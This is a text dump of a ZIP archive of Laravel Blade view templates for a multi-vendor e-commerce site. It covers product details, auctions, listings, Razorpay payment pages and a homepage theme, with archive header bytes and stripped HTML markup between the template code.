    • @endforeach
    PK�N] 'x�]]Cviews/frontend/product_details/frequently_bought_together.blade.phpnu�[���

    {{ translate('Frequently Bought Together') }}

    {{ translate('No frequently bought products found!') }}
    @endforelse
    PK�N]>��Bviews/frontend/product_details/from_this_seller_products.blade.phpnu�[���
    @php $shopslug = $detailedProduct->user->shop ? $detailedProduct->user->shop->slug : 'in-house'; @endphp

    {{ translate('Products from this Seller') }}

    {{ translate('View All') }}
    PK�N]+� ?]]9views/frontend/product_details/related_products.blade.phpnu�[���PK�N]�+�[w�w�Eviews/frontend/product_details/details.blade.php.bak_20260330_waitfixnu�[���
    @php $seller_logo = $detailedProduct->user->shop?->logo ? $detailedProduct->user->shop->logo : (json_decode(get_setting('business_info'), true) ?? [])['shop_logo'] ?? null; @endphp @if ($detailedProduct->auction_product != 1)
    @endif

    {{ $detailedProduct->getTranslation('name') }}

    @if ($detailedProduct->brand != null)
    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}
    @endif @if(get_setting('product_query_activation') == 1) @endif
    @php $total = 0; $total += $detailedProduct->reviews->where('status', 1)->count(); @endphp
    {{ renderStarRating($detailedProduct->rating) }}
    {{ $detailedProduct->rating }} /{{ translate('5.0') }} ({{ $total }} {{ translate('reviews') }})
    @if ($detailedProduct->variant_product)
    {{translate('SKU')}}
    @elseif (($detailedProduct->stocks->first()->sku))
    {{translate('SKU')}} {{($detailedProduct->stocks->first()->sku)}}
    @endif
    @if(get_setting('show_custom_product_visitors')==1)
    {{ translate('People are viewing right now')}}
    @endif
    @if ($detailedProduct->auction_product) {{ translate('Bided')}} {{$detailedProduct->bids()->count()}} @else {{-- {{ translate('Total Ordered')}} {{$detailedProduct->orderDetails()->count()}} --}} @endif
    @if($detailedProduct->todays_deal)
    {{ translate('Todays Deal')}} {{ translate('Exclusive for today only')}}
    @endif @php $flashDealEndDate = get_product_active_flash_deal_end_date($detailedProduct->id, $detailedProduct->discount_end_date); $flashDealnotEnd = !is_null($flashDealEndDate); @endphp @if($flashDealnotEnd)
    {{translate('Flash Sale')}}
    {{ translate('Loading...')}}
    @endif
    @if ($detailedProduct->auction_product)

    {{ translate('Auction Status') }}

    {{ translate('Auction Will End') }}
    @if ($detailedProduct->auction_end_date > strtotime('now'))
    @else

    {{ translate('Ended') }}

    @endif
    {{ translate('Starting Bid') }}
    {{ single_price($detailedProduct->starting_bid) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    {{ translate('Highest Bid') }}
    @php $highest_bid = $detailedProduct->bids->max('amount'); @endphp @if ($highest_bid != null) {{ single_price($highest_bid) }} @endif
    @php $highest_bid = $detailedProduct->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $detailedProduct->starting_bid; $gst_rate = gst_applicable_product_rate($detailedProduct->id); @endphp @if ($detailedProduct->auction_end_date >= strtotime('now'))
    @if (Auth::check() && $detailedProduct->user_id == Auth::user()->id) {{ translate('Seller cannot Place Bid to His Own Product') }} @else @endif
    @endif @if ($detailedProduct->est_shipping_days)

    {{ translate('Estimate Shipping Time') }} {{ $detailedProduct->est_shipping_days }} {{ translate('Days') }}

    @endif
    @if ($detailedProduct->brand != null)
    {{ $detailedProduct->brand->name }}

    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}

    {{ translate('Products from this brand') }}
    @endif
      @if ($detailedProduct->cash_on_delivery)
    • warranty check circle {{ translate('Cash on Delivery Available')}}
    • @endif @if ($detailedProduct->shipping_type == 'free')
    • warranty check circle {{ translate('Free Shipping') }}
    • @endif
    @else
    @csrf
    {{ translate('Pricing') }}
    @if ($detailedProduct->digital == 0)
    {{ home_discounted_price($detailedProduct) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    @if (home_price($detailedProduct) != home_discounted_price($detailedProduct)) {{ home_price($detailedProduct) }} @endif
    @if ($detailedProduct->pdf != null) {{ translate('Download product specifation') }} @endif
    @else
    {{ home_discounted_price($detailedProduct) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    @if (home_price($detailedProduct) != home_discounted_price($detailedProduct)) {{ home_price($detailedProduct) }} @endif
    @endif @if (discount_in_percentage($detailedProduct) > 0 || (addon_is_activated('club_point') && $detailedProduct->earn_point > 0))
    @if (discount_in_percentage($detailedProduct) > 0 && (home_price($detailedProduct) != home_discounted_price($detailedProduct))) -{{ discount_in_percentage($detailedProduct) }}% @endif @if (addon_is_activated('club_point') && $detailedProduct->earn_point > 0) {{ translate('Club Point') }}: {{ $detailedProduct->earn_point }} @endif
    @endif
    @if ($detailedProduct->wholesale_product == 1)
    @foreach ($detailedProduct->stocks->first()->wholesalePrices as $wholesalePrice) @endforeach
    {{ translate('Min Qty') }} {{ translate('Max Qty') }} {{ translate('Unit Price') }}
    {{ $wholesalePrice->min_qty }} {{ $wholesalePrice->max_qty }} {{ single_price($wholesalePrice->price) }}
    @else @if ($detailedProduct->variant_product) @php $colorCount = ($detailedProduct->colors && count(json_decode($detailedProduct->colors)) > 0) ? 1 : 0; $choiceCount = collect(json_decode($detailedProduct->choice_options ?? '[]', true))->count(); $product_variations = $colorCount + $choiceCount; @endphp
    {{translate('Variation')}}
    @php $sizeChartId = ($detailedProduct->main_category && $detailedProduct->main_category->sizeChart) ? $detailedProduct->main_category->sizeChart->id : 0; $sizeChartName = ($detailedProduct->main_category && $detailedProduct->main_category->sizeChart) ? $detailedProduct->main_category->sizeChart->name : null; @endphp @if($sizeChartId != 0)
    @endif
    @endif @endif @if (((get_setting('product_external_link_for_seller') == 1) && ($detailedProduct->added_by == "seller") && ($detailedProduct->external_link != null)) || (($detailedProduct->added_by != "seller") && ($detailedProduct->external_link != null))) @else
    @if ($detailedProduct->digital == 0)
    @else @endif
    @if ($detailedProduct->digital ==0) @php $qty = 0; foreach ($detailedProduct->stocks as $key => $stock) { $qty += $stock->qty; } @endphp

    @if ($detailedProduct->stock_visibility_state == 'quantity') {{ $qty }} {{translate('Available')}} @elseif($detailedProduct->stock_visibility_state == 'text' && $qty >= 1) {{translate('In Stock')}} @endif

    {{translate('Minimum order qty')}} {{ $detailedProduct->min_qty }}

    @endif
    @if ($detailedProduct->digital ==0)
    {{ translate('QTY')}}
    @endif @if (get_setting('whatsapp_order') == 1) @php $storeName = env('APP_NAME'); $productTitle = $detailedProduct->getTranslation('name'); $productUrl = URL::to('/product') . '/' . $detailedProduct->slug; $template = get_setting('order_messege_template'); $message = str_replace( ['[[storeName]]', '[[productTitle]]', '[[productUrl]]'], [$storeName, $productTitle, $productUrl], $template ); $whatsappNumber = preg_replace('/[^0-9]/', '', env('WHATSAPP_NUMBER')); $whatsappUrl = "https://wa.me/{$whatsappNumber}?text=" . urlencode($message); @endphp @if (($detailedProduct->added_by == 'seller' && get_setting('whatsapp_order_seller_prods') == 1) || ($detailedProduct->added_by == 'admin')) @endif @endif
    @if($detailedProduct->variant_product)

    {{translate('Selected Product Summery')}}

    {{ strlen($detailedProduct->getTranslation('name')) > 120 ? substr($detailedProduct->getTranslation('name'), 0, 120).'...' : $detailedProduct->getTranslation('name') }} -
    @endif
    @endif @if ($detailedProduct->est_shipping_days)

    {{ translate('Estimate Shipping Time') }} {{ $detailedProduct->est_shipping_days }} {{ translate('Days') }}

    @endif
    @if ($detailedProduct->brand != null)
    {{ $detailedProduct->brand->name }}

    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}

    {{ translate('Products from this brand') }}
    @endif
    @if ($detailedProduct->has_warranty == 1 && $detailedProduct->warranty_id != null)

    {{ translate('Warranty') }}

    {{ translate('This Product has') }} {{ $detailedProduct->warranty->getTranslation('text')}} {{ translate('warranty') }}

    @if($detailedProduct->warranty_note_id != null) {{ translate('View Details') }} @endif
    Warranty Circle
    @endif
      @if ($detailedProduct->cash_on_delivery)
    • warranty check circle {{ translate('Cash on Delivery Available')}}
    • @endif @if ($detailedProduct->shipping_type == 'free')
    • warranty check circle {{ translate('Free Shipping') }}
    • @endif @if (addon_is_activated('refund_request') && $detailedProduct->refundable == 1)
    • warranty check circle {{ translate('Refund Available for this producte') }}
    • @endif
    @php $refund_sticker = get_setting('refund_sticker'); @endphp @if (addon_is_activated('refund_request') && $detailedProduct->refundable == 1) @endif
    @if (((get_setting('product_external_link_for_seller') == 1) && ($detailedProduct->added_by == "seller") && ($detailedProduct->external_link != null)) || (($detailedProduct->added_by != "seller") && ($detailedProduct->external_link != null))) @endif @if (Auth::check() && addon_is_activated('affiliate_system') && get_affliate_option_status() && Auth::user()->affiliate_user != null && Auth::user()->affiliate_user->status) @php if (Auth::check()) { if (Auth::user()->referral_code == null) { Auth::user()->referral_code = substr(Auth::user()->id . Str::random(10), 0, 10); Auth::user()->save(); } $referral_code = Auth::user()->referral_code; $referral_code_url = URL::to('/product') . '/' . $detailedProduct->slug . "?product_referral_code=$referral_code"; } @endphp
    @endif @endif
    PK�N]�+�[w�w�Eviews/frontend/product_details/details.blade.php.bak_20260330_livefixnu�[���
    @php $seller_logo = $detailedProduct->user->shop?->logo ? $detailedProduct->user->shop->logo : (json_decode(get_setting('business_info'), true) ?? [])['shop_logo'] ?? null; @endphp @if ($detailedProduct->auction_product != 1)
    @endif

    {{ $detailedProduct->getTranslation('name') }}

    @if ($detailedProduct->brand != null)
    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}
    @endif @if(get_setting('product_query_activation') == 1) @endif
    @php $total = 0; $total += $detailedProduct->reviews->where('status', 1)->count(); @endphp
    {{ renderStarRating($detailedProduct->rating) }}
    {{ $detailedProduct->rating }} /{{ translate('5.0') }} ({{ $total }} {{ translate('reviews') }})
    @if ($detailedProduct->variant_product)
    {{translate('SKU')}}
    @elseif (($detailedProduct->stocks->first()->sku))
    {{translate('SKU')}} {{($detailedProduct->stocks->first()->sku)}}
    @endif
    @if(get_setting('show_custom_product_visitors')==1)
    {{ translate('People are viewing right now')}}
    @endif
    @if ($detailedProduct->auction_product) {{ translate('Bided')}} {{$detailedProduct->bids()->count()}} @else {{-- {{ translate('Total Ordered')}} {{$detailedProduct->orderDetails()->count()}} --}} @endif
    @if($detailedProduct->todays_deal)
    {{ translate('Todays Deal')}} {{ translate('Exclusive for today only')}}
    @endif @php $flashDealEndDate = get_product_active_flash_deal_end_date($detailedProduct->id, $detailedProduct->discount_end_date); $flashDealnotEnd = !is_null($flashDealEndDate); @endphp @if($flashDealnotEnd)
    {{translate('Flash Sale')}}
    {{ translate('Loading...')}}
    @endif
    @if ($detailedProduct->auction_product)

    {{ translate('Auction Status') }}

    {{ translate('Auction Will End') }}
    @if ($detailedProduct->auction_end_date > strtotime('now'))
    @else

    {{ translate('Ended') }}

    @endif
    {{ translate('Starting Bid') }}
    {{ single_price($detailedProduct->starting_bid) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    {{ translate('Highest Bid') }}
    @php $highest_bid = $detailedProduct->bids->max('amount'); @endphp @if ($highest_bid != null) {{ single_price($highest_bid) }} @endif
    @php $highest_bid = $detailedProduct->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $detailedProduct->starting_bid; $gst_rate = gst_applicable_product_rate($detailedProduct->id); @endphp @if ($detailedProduct->auction_end_date >= strtotime('now'))
    @if (Auth::check() && $detailedProduct->user_id == Auth::user()->id) {{ translate('Seller cannot Place Bid to His Own Product') }} @else @endif
    @endif @if ($detailedProduct->est_shipping_days)

    {{ translate('Estimate Shipping Time') }} {{ $detailedProduct->est_shipping_days }} {{ translate('Days') }}

    @endif
    @if ($detailedProduct->brand != null)
    {{ $detailedProduct->brand->name }}

    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}

    {{ translate('Products from this brand') }}
    @endif
      @if ($detailedProduct->cash_on_delivery)
    • warranty check circle {{ translate('Cash on Delivery Available')}}
    • @endif @if ($detailedProduct->shipping_type == 'free')
    • warranty check circle {{ translate('Free Shipping') }}
    • @endif
    @else
    @csrf
    {{ translate('Pricing') }}
    @if ($detailedProduct->digital == 0)
    {{ home_discounted_price($detailedProduct) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    @if (home_price($detailedProduct) != home_discounted_price($detailedProduct)) {{ home_price($detailedProduct) }} @endif
    @if ($detailedProduct->pdf != null) {{ translate('Download product specifation') }} @endif
    @else
    {{ home_discounted_price($detailedProduct) }} @if ($detailedProduct->unit != null) /{{ $detailedProduct->getTranslation('unit') }} @endif
    @if (home_price($detailedProduct) != home_discounted_price($detailedProduct)) {{ home_price($detailedProduct) }} @endif
    @endif @if (discount_in_percentage($detailedProduct) > 0 || (addon_is_activated('club_point') && $detailedProduct->earn_point > 0))
    @if (discount_in_percentage($detailedProduct) > 0 && (home_price($detailedProduct) != home_discounted_price($detailedProduct))) -{{ discount_in_percentage($detailedProduct) }}% @endif @if (addon_is_activated('club_point') && $detailedProduct->earn_point > 0) {{ translate('Club Point') }}: {{ $detailedProduct->earn_point }} @endif
    @endif
    @if ($detailedProduct->wholesale_product == 1)
    @foreach ($detailedProduct->stocks->first()->wholesalePrices as $wholesalePrice) @endforeach
    {{ translate('Min Qty') }} {{ translate('Max Qty') }} {{ translate('Unit Price') }}
    {{ $wholesalePrice->min_qty }} {{ $wholesalePrice->max_qty }} {{ single_price($wholesalePrice->price) }}
    @else @if ($detailedProduct->variant_product) @php $colorCount = ($detailedProduct->colors && count(json_decode($detailedProduct->colors)) > 0) ? 1 : 0; $choiceCount = collect(json_decode($detailedProduct->choice_options ?? '[]', true))->count(); $product_variations = $colorCount + $choiceCount; @endphp
    {{translate('Variation')}}
    @php $sizeChartId = ($detailedProduct->main_category && $detailedProduct->main_category->sizeChart) ? $detailedProduct->main_category->sizeChart->id : 0; $sizeChartName = ($detailedProduct->main_category && $detailedProduct->main_category->sizeChart) ? $detailedProduct->main_category->sizeChart->name : null; @endphp @if($sizeChartId != 0)
    @endif
    @endif @endif @if (((get_setting('product_external_link_for_seller') == 1) && ($detailedProduct->added_by == "seller") && ($detailedProduct->external_link != null)) || (($detailedProduct->added_by != "seller") && ($detailedProduct->external_link != null))) @else
    @if ($detailedProduct->digital == 0)
    @else @endif
    @if ($detailedProduct->digital ==0) @php $qty = 0; foreach ($detailedProduct->stocks as $key => $stock) { $qty += $stock->qty; } @endphp

    @if ($detailedProduct->stock_visibility_state == 'quantity') {{ $qty }} {{translate('Available')}} @elseif($detailedProduct->stock_visibility_state == 'text' && $qty >= 1) {{translate('In Stock')}} @endif

    {{translate('Minimum order qty')}} {{ $detailedProduct->min_qty }}

    @endif
    @if ($detailedProduct->digital ==0)
    {{ translate('QTY')}}
    @endif @if (get_setting('whatsapp_order') == 1) @php $storeName = env('APP_NAME'); $productTitle = $detailedProduct->getTranslation('name'); $productUrl = URL::to('/product') . '/' . $detailedProduct->slug; $template = get_setting('order_messege_template'); $message = str_replace( ['[[storeName]]', '[[productTitle]]', '[[productUrl]]'], [$storeName, $productTitle, $productUrl], $template ); $whatsappNumber = preg_replace('/[^0-9]/', '', env('WHATSAPP_NUMBER')); $whatsappUrl = "https://wa.me/{$whatsappNumber}?text=" . urlencode($message); @endphp @if (($detailedProduct->added_by == 'seller' && get_setting('whatsapp_order_seller_prods') == 1) || ($detailedProduct->added_by == 'admin')) @endif @endif
    @if($detailedProduct->variant_product)

    {{translate('Selected Product Summery')}}

    {{ strlen($detailedProduct->getTranslation('name')) > 120 ? substr($detailedProduct->getTranslation('name'), 0, 120).'...' : $detailedProduct->getTranslation('name') }} -
    @endif
    @endif @if ($detailedProduct->est_shipping_days)

    {{ translate('Estimate Shipping Time') }} {{ $detailedProduct->est_shipping_days }} {{ translate('Days') }}

    @endif
    @if ($detailedProduct->brand != null)
    {{ $detailedProduct->brand->name }}

    {{ translate('Brand') }} {{ $detailedProduct->brand->name }}

    {{ translate('Products from this brand') }}
    @endif
    @if ($detailedProduct->has_warranty == 1 && $detailedProduct->warranty_id != null)

    {{ translate('Warranty') }}

    {{ translate('This Product has') }} {{ $detailedProduct->warranty->getTranslation('text')}} {{ translate('warranty') }}

    @if($detailedProduct->warranty_note_id != null) {{ translate('View Details') }} @endif
    Warranty Circle
    @endif
      @if ($detailedProduct->cash_on_delivery)
    • warranty check circle {{ translate('Cash on Delivery Available')}}
    • @endif @if ($detailedProduct->shipping_type == 'free')
    • warranty check circle {{ translate('Free Shipping') }}
    • @endif @if (addon_is_activated('refund_request') && $detailedProduct->refundable == 1)
    • warranty check circle {{ translate('Refund Available for this producte') }}
    • @endif
    @php $refund_sticker = get_setting('refund_sticker'); @endphp @if (addon_is_activated('refund_request') && $detailedProduct->refundable == 1) @endif
    @if (((get_setting('product_external_link_for_seller') == 1) && ($detailedProduct->added_by == "seller") && ($detailedProduct->external_link != null)) || (($detailedProduct->added_by != "seller") && ($detailedProduct->external_link != null))) @endif @if (Auth::check() && addon_is_activated('affiliate_system') && get_affliate_option_status() && Auth::user()->affiliate_user != null && Auth::user()->affiliate_user->status) @php if (Auth::check()) { if (Auth::user()->referral_code == null) { Auth::user()->referral_code = substr(Auth::user()->id . Str::random(10), 0, 10); Auth::user()->save(); } $referral_code = Auth::user()->referral_code; $referral_code_url = URL::to('/product') . '/' . $detailedProduct->slug . "?product_referral_code=$referral_code"; } @endphp
    @endif @endif
    PK�N]p>��2�2�(views/frontend/product_details.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $detailedProduct->meta_title }}@stop @section('meta_description'){{ $detailedProduct->meta_description }}@stop @section('meta_keywords'){{ $detailedProduct->tags }},{{ $detailedProduct->meta_keywords }}@stop @section('meta') @php $availability = "out of stock"; $qty = 0; if($detailedProduct->variant_product) { foreach ($detailedProduct->stocks as $key => $stock) { $qty += $stock->qty; } } else { $qty = optional($detailedProduct->stocks->first())->qty; } if($qty > 0){ $availability = "in stock"; } @endphp @endsection @section('content')
    @include('frontend.product_details.image_gallery')
    @include('frontend.product_details.details')
    getTranslation('description'); ?>
    @if($detailedProduct->auction_product != 1)
    @include('frontend.product_details.related_products')
    @endif @include('frontend.product_details.review_section') @if(get_setting('product_query_activation') == 1)
    @include('frontend.product_details.product_queries')
    @endif @if($detailedProduct->auction_product != 1)
    @include('frontend.product_details.frequently_bought_together')
    @include('frontend.product_details.from_this_seller_products')
    @endif
    @if ($detailedProduct->auction_product != 1) @include('frontend.smart_bar') @endif @endsection @section('modal') @include('frontend.partials.image_viewer') @if($detailedProduct->auction_product == 1) @php $highest_bid = $detailedProduct->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid+1 : $detailedProduct->starting_bid; $gst_rate = gst_applicable_product_rate($detailedProduct->id); @endphp @endif @include('modals.size_chart_show_modal') @endsection @section('script') @if(get_setting('show_custom_product_visitors')==1) @endif @if (get_setting('google_analytics') == 1) @endif @endsection PK�N]x!3D�D�(views/frontend/product_listing.blade.phpnu�[���@extends('frontend.layouts.app') @php $form_all_preorder_page = session('preorder_all_page'); session()->forget('preorder_all_page'); @endphp @if (isset($category_id)) @php $category_search = $category; $meta_title = $category->meta_title; $meta_description = $category->meta_description; $meta_keywords = $category->meta_keywords; @endphp @elseif (isset($brand_id)) @php $brand_name = get_single_brand($brand_id)->name; $meta_title = get_single_brand($brand_id)->meta_title; $meta_description = get_single_brand($brand_id)->meta_description; $meta_keywords = get_single_brand($brand_id)->meta_keywords; @endphp @else @php $meta_title = get_setting('meta_title'); $meta_description = get_setting('meta_description'); @endphp @endif @section('meta_title'){{ $meta_title }}@stop @section('meta_description'){{ $meta_description }}@stop @section('meta_keywords'){{ $meta_keywords ?? '' }}@stop @section('meta') @endsection @section('content')
    @if (addon_is_activated('preorder') && Route::currentRouteName() == 'search')
    @php $activeClasses = 'bg-soft-dark text-white'; $inActiveClasses = 'preorder-border-dashed text-muted fw-600'; @endphp
    @endif

    @if (isset($category_id)) {{-- {{ $category_search->getTranslation('name') }} --}} {{ translate('Showing results') }} @elseif(isset($query)) {{ translate('Search result for ') }} "{{ $query }}" @else {{ translate('Showing results') }} @endif

    {{-- @foreach ($products as $key => $product)
    @if (isset($product_type) && $product_type == 'preorder_product') @include('preorder.frontend.product_box3', [ 'product' => $product, ]) @else @include('frontend.product_box_for_listing_page', [ 'product' => $product, ]) @endif
    @endforeach --}}
    @endsection @section('script') @endsection PK�N]x᥈��<views/frontend/product_listing_page_child_category.blade.phpnu�[���@php $value = null; for ($i=0; $i < $child_category->level; $i++){ $value .= '-'; } @endphp
  • {{ $value }} {{ $childCategory->getTranslation('name') }} @if($childCategory->products_count > 0) {{ " (". $childCategory->products_count . ")" }} @endif
  • @if ($child_category->childrenCategories) @foreach ($child_category->childrenCategories as $childCategory) @include('frontend.product_listing_page_child_category', ['child_category' => $childCategory]) @endforeach @endif PK�N]��Yc��Eviews/frontend/product_listing_page_child_category_preorder.blade.phpnu�[���@php $value = null; for ($i=0; $i < $child_category->level; $i++){ $value .= '-'; } @endphp
  • {{ $value }} {{ $childCategory->getTranslation('name') }} @if($childCategory->products_count > 0) {{ " (". $childCategory->products_count . ")" }} @endif
  • @if ($child_category->childrenCategories) @foreach ($child_category->childrenCategories as $childCategory) @include('frontend.product_listing_page_child_category_preorder', ['child_category' => $childCategory]) @endforeach @endif PK�N]VŴ] ] 3views/frontend/product_listing_pagination.blade.phpnu�[���@if ($last > 1) @endif PK�N]\�K+��1views/frontend/product_listing_products.blade.phpnu�[���@foreach ($products as $key => $product)
    @if (isset($product_type) && $product_type == 'preorder_product') @include('preorder.frontend.product_box3', [ 'product' => $product, ]) @else @include( 'frontend.product_box_for_listing_page', ['product' => $product] ) @endif
    @endforeachPK�N]f���66/views/frontend/razorpay/order_payment.blade.phpnu�[���
    PK�N] ��-��0views/frontend/razorpay/wallet_payment.blade.phpnu�[���
    PK�N]CY|>kkGviews/frontend/razor_wallet/customer_package_payment_Razorpay.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $customer_package = get_single_customer_package(Session::get('payment_data')['customer_package_id']); @endphp @endsection @section('script') @endsection PK�N]j�uu<views/frontend/razor_wallet/order_payment_Razorpay.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @endsection @section('script') @endsection PK�N]�O�zdd?views/frontend/razor_wallet/order_re_payment_Razorpay.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @endsection @section('script') @endsection PK�N]���A��Eviews/frontend/razor_wallet/seller_package_payment_Razorpay.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $seller_package = get_single_seller_package(Session::get('payment_data')['seller_package_id']); @endphp @endsection @section('script') @endsection PK�N]�I���=views/frontend/razor_wallet/wallet_payment_Razorpay.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @endsection @section('script') @endsection PK�N]*d������(views/frontend/reclassic/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $lang = get_system_language()->code; @endphp
    @include('frontend.'.get_setting("homepage_select").'.partials.category_menu')
    @if (get_setting('home_slider_images', null, $lang) != null)
    @endif @if (count($featured_categories) > 0)
    @endif
    @php $todays_deal_products = filter_products(App\Models\Product::where('todays_deal', '1'))->orderBy('id', 'desc')->get(); @endphp @if(count($todays_deal_products) > 0)
    {{ translate('Todays Deal') }} {{ translate('Hot') }}
    @endif
    @php $homeBanner1Images = get_setting('home_banner1_images', null, $lang); @endphp @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $data_md = count($banner_1_imags) >= 2 ? 2 : 1; $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif @php $flash_deal = get_featured_flash_deal(); $flash_deal_bg = get_setting('flash_deal_bg_color'); @endphp @if ($flash_deal != null)
    @php $flash_deal_products = get_flash_deal_products($flash_deal->id); @endphp
    @endif @if (addon_is_activated('preorder')) @php $homepreorder_banner_1Images = get_setting('home_preorder_banner_1_images', null, $lang); @endphp @if ($homepreorder_banner_1Images != null)
    @php $banner_2_imags = json_decode($homepreorder_banner_1Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp
    @endif @endif @php $homeBanner2Images = get_setting('home_banner2_images', null, $lang); @endphp @if ($homeBanner2Images != null)
    @php $banner_2_imags = json_decode($homeBanner2Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_banner2_links = get_setting('home_banner2_links', null, $lang); @endphp
    @endif
    @php $homeBanner3Images = get_setting('home_banner3_images', null, $lang); @endphp @if ($homeBanner3Images != null)
    @php $banner_3_imags = json_decode($homeBanner3Images); $data_md = count($banner_3_imags) >= 2 ? 2 : 1; $home_banner3_links = get_setting('home_banner3_links', null, $lang); @endphp
    @endif @if (addon_is_activated('auction'))
    @endif @if (get_setting('coupon_system') == 1)
    {{ translate(get_setting('cupon_title')) }}
    {{ translate(get_setting('cupon_subtitle')) }}
    {{ env('APP_NAME') }} promo
    @endif
    @if (addon_is_activated('preorder')) @include('preorder.frontend.home_page.newest_preorder') @endif @if (get_setting('classified_product') == 1) @php $classified_products = get_home_page_classified_products(6); $classified_section_bg = get_setting('classified_section_bg_color'); @endphp @if (count($classified_products) > 0)

    {{ translate('Classified Ads') }}

    @php $classifiedBannerImage = get_setting('classified_banner_image', null, $lang); $classifiedBannerImageSmall = get_setting('classified_banner_image_small', null, $lang); @endphp @if ($classifiedBannerImage != null || $classifiedBannerImageSmall != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif
    @foreach ($classified_products as $key => $classified_product)

    {{ $classified_product->getTranslation('name') }}

    {{ $classified_product->user ? $classified_product->user->name : '' }}
    {{ single_price($classified_product->unit_price) }}
    @if ($classified_product->conditon == 'new') {{ translate('New') }} @elseif($classified_product->conditon == 'used') {{ translate('Used') }} @endif
    @endforeach
    @endif @endif @if (get_setting('vendor_system_activation') == 1) @php $best_selers = get_best_sellers(6); $sellers_section_bg = get_setting('sellers_section_bg_color'); @endphp @if (count($best_selers) > 0)

    {{ translate('Top Sellers') }}

    @foreach ($best_selers as $key => $seller)
    {{ $seller->name }}
    @if ($seller->verification_status == 1) @else @endif

    {{ $seller->name }}

    {{ renderStarRating($seller->rating) }} ({{ $seller->num_of_reviews }} {{ translate('Reviews') }})
    {{ ucfirst(translate('Visit Store')) }}
    @endforeach
    @endif @endif @if (get_setting('top_brands') != null) @php $brands_section_bg = get_setting('brands_section_bg_color'); @endphp

    {{ translate('Top Brands') }}

    @php $top_brands = json_decode(get_setting('top_brands')); $brands = get_brands($top_brands); @endphp @foreach ($brands as $brand) @endforeach
    @endif @endsection PK�N]��w�> > @views/frontend/reclassic/partials/best_sellers_section.blade.phpnu�[���@if (get_setting('vendor_system_activation') == 1)

    {{ translate('Best Sellers')}}

    {{ translate('View All Sellers') }}
    @endif PK�N]� �' ' @views/frontend/reclassic/partials/best_selling_section.blade.phpnu�[���@php $best_selling_products = get_best_selling_products(20); $best_selling_section_bg = get_setting('best_selling_section_bg_color'); @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    @endif PK�N]Gz�9views/frontend/reclassic/partials/category_menu.blade.phpnu�[���
      @foreach (get_level_zero_categories()->take(12) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    • {{ $category_name }} {{ $category_name }}
    • @endforeach
    PK�N]��R��Eviews/frontend/reclassic/partials/featured_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0) @php $featured_bg = get_setting('featured_section_bg_color'); @endphp

    {{ translate('Featured Products') }}

    @endif PK�N]0�q��Cviews/frontend/reclassic/partials/home_categories_section.blade.phpnu�[���@if (get_setting('home_categories') != null) @php $home_categories = json_decode(get_setting('home_categories')); $categories = get_category($home_categories); @endphp @if (count($categories) > 0)
    @foreach ($categories as $category_key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    @endforeach
    @endif @endif PK�N]-Rb���Cviews/frontend/reclassic/partials/last_view_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @endif @if ($product->auction_product == 0) @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�P��} } Cviews/frontend/reclassic/partials/newest_products_section.blade.phpnu�[���@if (count($newest_products) > 0) @php $new_products_section_bg = get_setting('new_products_section_bg_color'); @endphp

    {{ translate('New Products') }}

    @endif PK�N]ç�J**Eviews/frontend/reclassic/partials/preorder_products_section.blade.phpnu�[���@if (count($preorder_products) > 0) @php $featured_bg = get_setting('featured_section_bg_color'); @endphp
    @endifPK�N]� /&&9views/frontend/reclassic/partials/product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
